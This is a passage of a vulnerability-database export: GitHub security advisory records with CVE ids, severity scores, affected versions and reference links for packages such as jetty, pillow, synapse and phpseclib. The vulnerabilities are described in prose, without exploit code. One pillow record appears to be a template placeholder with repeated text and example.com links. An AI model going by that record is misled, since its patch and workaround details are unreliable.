'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.8.15'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.9.13'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-14365'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/commit/9bea33ffa3be3d64827f59882d95b817cfab9b7e'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1869154'}, {'type': 'PACKAGE', 'url': 'https://github.com/ansible/ansible'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4950'}]","{'cwe_ids': ['CWE-347'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-02T22:49:57Z', 'nvd_published_at': '2020-09-23T13:15:00Z'}" +1.4.0,GHSA-j6qj-j888-vvgq,2022-04-22T15:49:55Z,2021-04-06T17:32:00Z,,['CVE-2021-28163'],Directory exposure in jetty,"### Impact +If the `${jetty.base}` directory or the `${jetty.base}/webapps` directory is a symlink (soft link in Linux), the contents of the `${jetty.base}/webapps` directory may be deployed as a static web application, exposing the content of the directory for download. + +For example, the problem manifests in the following `${jetty.base}`: +```$ tree demo-base/ +demo-base/ +├── etc +├── lib +├── resources +├── start.d +├── deploy +│   └── async-rest.war +└── webapps -> deploy + +``` + +### Workarounds +Do not use a symlink","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.eclipse.jetty:jetty-deploy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.4.32'}, {'fixed': '9.4.39'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.eclipse.jetty:jetty-deploy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.0.2'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.eclipse.jetty:jetty-deploy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '11.0.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/eclipse/jetty.project/security/advisories/GHSA-j6qj-j888-vvgq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28163'}, {'type': 'PACKAGE', 'url': 'https://github.com/eclipse/jetty.project'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0841b06b48324cfc81325de3c05a92e53f997185f9d71ff47734d961@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r111f1ce28b133a8090ca4f809a1bdf18a777426fc058dc3a16c39c66@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2ea2f0541121f17e470a0184843720046c59d4bde6d42bf5ca6fad81@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4a66bfbf62281e31bc1345ebecbfd96f35199eecd77bfe4e903e906f@%3Cissues.ignite.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4b1fef117bccc7f5fd4c45fd2cabc26838df823fe5ca94bc42a4fd46@%3Cissues.ignite.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5b3693da7ecb8a75c0e930b4ca26a5f97aa0207d9dae4aa8cc65fe6b@%3Cissues.ignite.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r67c4f90658fde875521c949448c54c98517beecdc7f618f902c620ec@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6ac9e263129328c0db9940d72b4a6062e703c58918dd34bd22cdf8dd@%3Cissues.ignite.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r780c3c210a05c5bf7b4671303f46afc3fe56758e92864e1a5f0590d0@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r787e47297a614b05b99d01b04c8a1d6c0cafb480c9cb7c624a6b8fc3@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8a1a332899a1f92c8118b0895b144b27a78e3f25b9d58a34dd5eb084@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9974f64723875052e02787b2a5eda689ac5247c71b827d455e5dc9a6@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbc075a4ac85e7a8e47420b7383f16ffa0af3b792b8423584735f369f@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbefa055282d52d6b58d29a79fbb0be65ab0a38d25f00bd29eaf5e6fd@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd0471252aeb3384c3cfa6d131374646d4641b80dd313e7b476c47a9c@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd7c8fb305a8637480dc943ba08424c8992dccad018cd1405eb2afe0e@%3Cdev.ignite.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rddbb4f8d5db23265bb63d14ef4b3723b438abc1589f877db11d35450@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf36f1114e84a3379b20587063686148e2d5a39abc0b8a66ff2a9087a@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5CXQIJVYU4R3JL6LSPXQ5GIV7WLLA7PI/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GGNKXBNRRCZTGGXPIX3VBWCF2SAM3DWS/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HAAKW7S66TECXGJZWB3ZFGOQAK34IYHF/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210611-0006/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-200', 'CWE-59'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-04-02T23:13:08Z', 'nvd_published_at': '2021-04-01T15:15:00Z'}" +1.4.0,GHSA-5chj-xprr-7qqx,2022-01-04T19:33:28Z,2021-04-22T16:15:33Z,,['CVE-2020-9447'],Cross-site Scripting in GwtUpload,The file-upload feature in GwtUpload 1.0.3 allows XSS via a crafted filename.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.googlecode.gwtupload:gwtupload'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-9447'}, {'type': 'WEB', 'url': 'https://github.com/manolo/gwtupload/issues/32'}, {'type': 'PACKAGE', 'url': 'https://github.com/manolo/gwtupload'}, {'type': 'WEB', 'url': 'https://www.coresecurity.com/advisories/gwtupload-xss-file-upload-functionality'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-20T22:17:42Z', 'nvd_published_at': '2020-02-28T16:15:00Z'}" +1.4.0,GHSA-6hgr-2g6q-3rmc,2021-10-08T21:22:21Z,2021-04-22T16:11:26Z,,[],Server session is not invalidated when logout() helper method of Authentication module is used in Vaadin 18-19,"`Authentication.logout()` helper in `com.vaadin:flow-client` versions 5.0.0 prior to 6.0.0 (Vaadin 18), and 6.0.0 through 6.0.4 (Vaadin 19.0.0 through 19.0.3) uses incorrect HTTP method, which, in combination with Spring Security CSRF protection, allows local attackers to access Fusion endpoints after the user attempted to log out. + +- https://vaadin.com/security/cve-2021-31408","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-client'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '6.0.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/flow/security/advisories/GHSA-6hgr-2g6q-3rmc'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/flow/pull/10577'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/flow/commit/815b967fc84fefa8d3a4d72b9a036f48b0d96326'}, {'type': 'PACKAGE', 'url': 'https://github.com/vaadin/flow/'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/cve-2021-31408'}]","{'cwe_ids': ['CWE-287'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-22T14:31:17Z', 'nvd_published_at': None}" +1.4.0,GHSA-hj5v-574p-mj7c,2023-08-07T13:05:28Z,2021-04-20T16:39:57Z,,['CVE-2020-29651'],py vulnerable to Regular Expression Denial of Service,A denial of service via regular expression in the py.path.svnwc component of py (aka python-py) through 1.9.0 could be used by attackers to cause a compute-time denial of service attack by supplying malicious input to the blame functionality.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'py'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.10.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-29651'}, {'type': 'WEB', 'url': 'https://github.com/pytest-dev/py/issues/256'}, {'type': 'WEB', 'url': 'https://github.com/pytest-dev/py/pull/257'}, {'type': 'WEB', 'url': 'https://github.com/pytest-dev/py/pull/257/commits/4a9017dc6199d2a564b6e4b0aa39d6d8870e4144'}, {'type': 'PACKAGE', 'url': 'https://github.com/pytest-dev/py'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AYWNYEV3FGDHPIHX4DDUDMFZ6NLCQRC4/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CHDTINIBJZ67T3W74QTBIY5LPKAXEOGR/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-09T21:17:48Z', 'nvd_published_at': '2020-12-09T07:15:00Z'}" +1.4.0,GHSA-69q2-p9xp-739v,2022-03-22T22:08:40Z,2021-04-20T16:32:08Z,,['CVE-2020-29128'],XML Injection in petl,"petl before 1.68, in some configurations, allows resolution of entities in an XML document.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'petl'}, 'ecosystem_specific': {'affected_functions': ['petl.io.xml.XmlView']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.8'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/petl-developers/petl/security/advisories/GHSA-f5gc-p5m3-v347'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-29128'}, {'type': 'WEB', 'url': 'https://github.com/petl-developers/petl/issues/526'}, {'type': 'WEB', 'url': 'https://github.com/petl-developers/petl/pull/527'}, {'type': 'WEB', 'url': 'https://github.com/petl-developers/petl/pull/527/commits/1b0a09f08c3cdfe2e69647bd02f97c1367a5b5f8'}, {'type': 'WEB', 'url': 'https://github.com/petl-developers/petl/commit/07420ef8463cc387aea84e2d6241cf556574e2a5'}, {'type': 'WEB', 'url': 'https://github.com/nvn1729/advisories/blob/master/cve-2020-29128.md'}, {'type': 'PACKAGE', 'url': 'https://github.com/petl-developers/petl'}, {'type': 'WEB', 'url': 'https://github.com/petl-developers/petl/compare/v1.6.7...v1.6.8'}, {'type': 'WEB', 'url': 'https://petl.readthedocs.io/en/stable/changes.html'}]","{'cwe_ids': ['CWE-91'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-13T19:20:39Z', 'nvd_published_at': '2020-11-26T05:15:00Z'}" +1.4.0,GHSA-vf4w-fg7r-5v94,2021-04-23T00:22:49Z,2021-04-07T20:56:55Z,,['CVE-2021-30130'],Improper Certificate Validation in phpseclib,phpseclib before 2.0.31 and 3.x before 3.0.7 mishandles RSA PKCS#1 v1.5 signature verification.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'phpseclib/phpseclib'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.7'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'phpseclib/phpseclib'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.31'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-30130'}, {'type': 'WEB', 'url': 'https://github.com/phpseclib/phpseclib/pull/1635'}, {'type': 'WEB', 'url': 'https://github.com/phpseclib/phpseclib/releases/tag/2.0.31'}, {'type': 'WEB', 'url': 'https://github.com/phpseclib/phpseclib/releases/tag/3.0.7'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2022/11/msg00024.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2022/11/msg00025.html'}]","{'cwe_ids': ['CWE-295', 'CWE-347'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-07T17:29:49Z', 'nvd_published_at': '2021-04-06T15:15:00Z'}" +1.4.0,GHSA-g78f-549w-c354,2021-04-07T23:21:37Z,2021-04-13T15:23:59Z,,['CVE-2020-28448'],Prototype Pollution in multi-ini,This affects the package multi-ini before 2.1.1. It is possible to pollute an object's prototype by specifying the proto object as part of an array.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'multi-ini'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28448'}, {'type': 'WEB', 'url': 'https://github.com/evangelion1204/multi-ini/pull/37'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-MULTIINI-1048969'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-07T23:21:37Z', 'nvd_published_at': '2020-12-22T13:15:00Z'}" +1.4.0,GHSA-w9fg-xffh-p362,2021-08-31T21:08:01Z,2021-04-13T15:12:51Z,,['CVE-2021-21394'],Denial of service (via resource exhaustion) due to improper input validation on third-party identifier endpoints,"### Impact +Missing input validation of some parameters on the endpoints used to confirm third-party identifiers could cause excessive use of disk space and memory leading to resource exhaustion. + +### Patches +The issue is fixed by #9321. + +### Workarounds +Depending on the needs and configuration of the homeserver a few options are available: + +1. Using email as third-party identifiers be disabled by not configuring the `email` setting. +2. Using phone numbers as third-party identifiers can be disabled by ensuring that `account_threepid_delegates.msisdn` is not configured. +3. Additionally, the affected endpoint patterns can be blocked at a reverse proxy: + + * `^/_matrix/client/(r0|unstable)/register/email` + * `^/_matrix/client/(r0|unstable)/register/msisdn` + * `^/_matrix/client/(r0|unstable)/account/password` + * `^/_matrix/client/(r0|unstable)/account/3pid`","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'matrix-synapse'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.28.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/security/advisories/GHSA-w9fg-xffh-p362'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21394'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/pull/9321'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/pull/9393'}, {'type': 'PACKAGE', 'url': 'https://github.com/matrix-org/synapse'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TNNAJOZNMVMXM6AS7RFFKB4QLUJ4IFEY/'}, {'type': 'WEB', 'url': 'https://pypi.org/project/matrix-synapse/'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-12T21:01:40Z', 'nvd_published_at': '2021-04-12T21:15:00Z'}" +1.4.0,GHSA-7359-3c6r-hfc2,2023-01-24T14:59:50Z,2021-04-22T16:22:15Z,,['CVE-2016-11086'],Improper Certificate Validation in oauth ruby gem,"lib/oauth/consumer.rb in the oauth-ruby gem through 0.5.4 for Ruby does not verify server X.509 certificates if a certificate bundle cannot be found, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'oauth'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-11086'}, {'type': 'WEB', 'url': 'https://github.com/oauth-xx/oauth-ruby/issues/137'}, {'type': 'WEB', 'url': 'https://github.com/oauth-xx/oauth-ruby/commit/eb5b00a91d4ef0899082fdba929c34ccad6d4ccb'}, {'type': 'PACKAGE', 'url': 'https://github.com/oauth-xx/oauth-ruby'}, {'type': 'WEB', 'url': 'https://github.com/oauth-xx/oauth-ruby/releases/tag/v0.5.5'}, {'type': 'WEB', 'url': 'https://rubygems.org/gems/oauth'}]","{'cwe_ids': ['CWE-295'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-20T18:23:58Z', 'nvd_published_at': '2020-09-24T20:15:00Z'}" +1.4.0,GHSA-jgpv-4h4c-xhw3,2021-04-22T17:01:01Z,2021-04-23T16:54:36Z,,[],Uncontrolled Resource Consumption in pillow,"### Impact +_Pillow before 8.1.1 allows attackers to cause a denial of service (memory consumption) because the reported size of a contained image is not properly checked for a BLP container, and thus an attempted memory allocation can be very large._ + +### Patches +_An issue was discovered in Pillow before 6.2.0. When reading specially crafted invalid image files, the library can either allocate very large amounts of memory or take an extremely long period of time to process the image._ + +### Workarounds +_An issue was discovered in Pillow before 6.2.0. When reading specially crafted invalid image files, the library can either allocate very large amounts of memory or take an extremely long period of time to process the image._ + +### References +https://nvd.nist.gov/vuln/detail/CVE-2021-27921 + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [example link to repo](http://example.com) +* Email us at [example email address](mailto:example@example.com)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'pillow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.1.2'}]}], 'database_specific': {'last_known_affected_version_range': '< 8.1.1'}}]","[{'type': 'WEB', 'url': 'https://github.com/calix2/pyVulApp/security/advisories/GHSA-jgpv-4h4c-xhw3'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-22T17:01:01Z', 'nvd_published_at': None}" +1.4.0,GHSA-p48w-vf3c-rqjx,2021-04-27T19:43:14Z,2021-04-29T21:51:21Z,,['CVE-2021-21365'],Cross-Site Scripting in Bootstrap Package,"### Problem +It has been discovered that rendering content in the website frontend is vulnerable to cross-site scripting. A valid backend user account is needed to exploit this vulnerability. + +The following templates are affected by the vulnerability: + +* `Resources/Private/Partials/ContentElements/Carousel/Item/CallToAction.html` +* `Resources/Private/Partials/ContentElements/Carousel/Item/Header.html` +* `Resources/Private/Partials/ContentElements/Carousel/Item/Text.html` +* `Resources/Private/Partials/ContentElements/Carousel/Item/TextAndImage.html` +* `Resources/Private/Partials/ContentElements/Header/SubHeader.html` + +Users of the extension, who have overwritten the affected templates with custom code must manually apply the security fix as shown in [this Git commit](https://github.com/benjaminkott/bootstrap_package/commit/de3a568fc311d6712d9339643e51e8627c80530b). + +### Solution +Update to version 7.1.2, 8.0.8, 9.0.4, 9.1.3, 10.0.10 or 11.0.3 of the Bootstrap Package that fix the problem described. + +Updated version are available from the TYPO3 extension manager, Packagist and at https://extensions.typo3.org/extension/download/bootstrap_package/. + +### Credits +Thanks to TYPO3 security team member Oliver Hader who reported and fixed the issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'bk2k/bootstrap-package'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.1.0'}, {'fixed': '7.1.2'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'bk2k/bootstrap-package'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.0.8'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'bk2k/bootstrap-package'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.0.4'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'bk2k/bootstrap-package'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.1.0'}, {'fixed': '9.1.3'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'bk2k/bootstrap-package'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.0.10'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'bk2k/bootstrap-package'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '11.0.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/benjaminkott/bootstrap_package/security/advisories/GHSA-p48w-vf3c-rqjx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21365'}, {'type': 'WEB', 'url': 'https://github.com/benjaminkott/bootstrap_package/commit/de3a568fc311d6712d9339643e51e8627c80530b'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-ext-sa-2021-007'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-27T19:43:14Z', 'nvd_published_at': '2021-04-27T20:15:00Z'}" +1.4.0,GHSA-fjq3-5pxw-4wj4,2023-09-07T15:55:33Z,2021-04-07T21:06:30Z,,['CVE-2020-7965'],Cross-Site Request Forgery in Webargs,"flaskparser.py in Webargs 5.x through 5.5.2 doesn't check that the Content-Type header is application/json when receiving JSON input. If the request body is valid JSON, it will accept it even if the content type is application/x-www-form-urlencoded. This allows for JSON POST requests to be made across domains, leading to CSRF.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'webargs'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.5.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'webargs'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0.b1'}, {'fixed': '6.0.0b4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7965'}, {'type': 'WEB', 'url': 'https://github.com/marshmallow-code/webargs/commit/b9ee8b0aa668207a363d9fd21d967eeadb975c3e'}, {'type': 'PACKAGE', 'url': 'https://github.com/marshmallow-code/webargs'}, {'type': 'WEB', 'url': 'https://webargs.readthedocs.io/en/latest/changelog.html#b4-2020-01-28'}, {'type': 'WEB', 'url': 'https://webargs.readthedocs.io/en/latest/changelog.html#id11'}]","{'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-29T22:19:18Z', 'nvd_published_at': '2020-01-29T15:15:00Z'}" +1.4.0,GHSA-jrh7-mhhx-6h88,2021-08-31T21:07:44Z,2021-04-13T15:12:40Z,,['CVE-2021-21393'],Denial of service (via resource exhaustion) due to improper input validation on groups/communities endpoints,"### Impact +Missing input validation of some parameters on the groups (also known as communities) endpoints could cause excessive use of disk space and memory leading to resource exhaustion. Additionally clients may have issues rendering large fields. + +### Patches +This issue is fixed by #9321 and #9393. + +### Workarounds +The groups feature can be disabled (by setting `enable_group_creation` to `False`) to mitigate this issue. Note that it is disabled by default. + +### Other information +Note that the groups feature is not part of the [Matrix specification](https://matrix.org/docs/spec/) and the chosen maximum lengths are arbitrary. Not all clients might abide by them.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'matrix-synapse'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.28.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/security/advisories/GHSA-jrh7-mhhx-6h88'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21393'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/pull/9321'}, {'type': 'WEB', 'url': 'https://github.com/matrix-org/synapse/pull/9393'}, {'type': 'PACKAGE', 'url': 'https://github.com/matrix-org/synapse'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TNNAJOZNMVMXM6AS7RFFKB4QLUJ4IFEY/'}, {'type': 'WEB', 'url': 'https://pypi.org/project/matrix-synapse/'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-12T20:48:55Z', 'nvd_published_at': '2021-04-12T22:15:00Z'}" +1.4.0,GHSA-c6p9-24rc-jr5h,2021-04-21T19:02:43Z,2021-04-22T16:15:15Z,,['CVE-2020-7744'],Remote Code Execution and download tracking in Mintegral SDK,"""This affects all versions of package com.mintegral.msdk:alphab. The Android SDK distributed by the company contains malicious functionality in this module that tracks: 1. Downloads from Google urls either within Google apps or via browser including file downloads, e-mail attachments and Google Docs links. 2. All apk downloads, either organic or not. Mintegral listens to download events in Android's download manager and detects if the downloaded file's url contains: a. google.com or comes from a Google app (the com.android.vending package) b. Ends with .apk for apk downloads In both cases, the module sends the captured data back to Mintegral's servers. Note that the malicious functionality keeps running even if the app is currently not in focus (running in the background).""","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.mintegral.msdk:alphab'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '14.6.01'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7744'}, {'type': 'WEB', 'url': 'https://snyk.io/blog/remote-code-execution-rce-sourmint/'}, {'type': 'WEB', 'url': 'https://snyk.io/research/sour-mint-malicious-sdk/'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-COMMINTEGRALMSDK-1018714'}]","{'cwe_ids': ['CWE-319'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-21T19:02:43Z', 'nvd_published_at': '2020-10-15T13:15:00Z'}" +1.4.0,GHSA-ffw3-6mp6-jmvj,2023-08-30T22:07:40Z,2021-04-07T21:05:57Z,,['CVE-2021-26559'],Improper Access Control in Apache Airflow,Improper Access Control on Configurations Endpoint for the Stable API of Apache Airflow allows users with Viewer or User role to get Airflow Configurations including sensitive information even when `[webserver] expose_config` is set to `False` in `airflow.cfg`. This allowed 